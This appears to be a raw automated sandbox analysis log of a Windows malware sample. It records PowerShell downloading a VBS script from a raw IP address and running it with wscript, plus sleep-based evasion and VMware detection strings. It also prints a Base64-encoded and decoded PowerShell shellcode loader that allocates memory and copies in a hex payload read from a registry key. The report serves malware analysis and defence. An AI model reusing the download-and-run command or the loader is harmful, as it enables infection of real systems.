    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6447Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1931Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4093Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3021Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4356Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1022Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 4093 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep count: 3021 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -12912720851596678s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1300Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1300Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Rl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000003.261623448.00000211B4F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: wscript.exe, 0000000B.00000003.357267664.0000026BD4807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 00000003.00000002.300706520.00000167FFDB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brdfdtton Stvne Zinced INDSTT Mettartamg7 Sala cebal FORST Osteolit1 Undiscou6 Adressa Canadi9 OVERTALE Beme destrukti OSTEANRETN Driftsstyr1 INDLEDENDE Bagt7 BARSLEDES OOPHO Laced9 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Hexastich1{[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);}"@#DEHACHE Tosse3 Teater6 dialectic ENLISTEDR Fdse7 Astro Swerver9 downey ribhust Tagr Sprges Villa5 Heterodyn1 EUPLOI Bytte3 snkerfr Bundgarn strmkreds Ltningbi5 inds Airlift5 OCTAVINAVI Skokomishb Udrensning5 Thrawcy Monosodi5 impaleme Indsatsent7 ordensm $Hexastich3=0;$Hexastich9=1048576;$Hexastich8=[Hexastich1]::VA(-1,[ref]$Hexastich3,0,[ref]$Hexastich9,12288,64)$Senaterfo=(Get-ItemProperty -Path "HKCU:\Software\TIOLOG").Acetamidph2$Util = [System.Byte[]]::CreateInstance([System.Byte],$Senaterfo.Length / 2)For($i=0; $i -lt $Senaterfo.Length; $i+=2){ $Util[$i/2] = [convert]::ToByte($Senaterfo.Substring($i, 2), 16) }for($concomita=0; $concomita -lt $Util.count ; $concomita++){[Hexastich1]::RtlMoveMemory($Hexastich3+$concomita,[r
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brdfdtton Stvne Zinced INDSTT Mettartamg7 Sala cebal FORST Osteolit1 Undiscou6 Adressa Canadi9 OVERTALE Beme destrukti OSTEANRETN Driftsstyr1 INDLEDENDE Bagt7 BARSLEDES OOPHO Laced9 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Hexastich1{[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);}"@#DEHACHE Tosse3 Teater6 dialectic ENLISTEDR Fdse7 Astro Swerver9 downey ribhust Tagr Sprges Villa5 Heterodyn1 EUPLOI Bytte3 snkerfr Bundgarn strmkreds Ltningbi5 inds Airlift5 OCTAVINAVI Skokomishb Udrensning5 Thrawcy Monosodi5 impaleme Indsatsent7 ordensm $Hexastich3=0;$Hexastich9=1048576;$Hexastich8=[Hexastich1]::VA(-1,[ref]$Hexastich3,0,[ref]$Hexastich9,12288,64)$Senaterfo=(Get-ItemProperty -Path "HKCU:\Software\TIOLOG").Acetamidph2$Util = [System.Byte[]]::CreateInstance([System.Byte],$Senaterfo.Length / 2)For($i=0; $i -lt $Senaterfo.Length; $i+=2){ $Util[$i/2] = [convert]::ToByte($Senaterfo.Substring($i, 2), 16) }for($concomita=0; $concomita -lt $Util.count ; $concomita++){[Hexastich1]::RtlMoveMemory($Hexastich3+$concomita,[rJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgA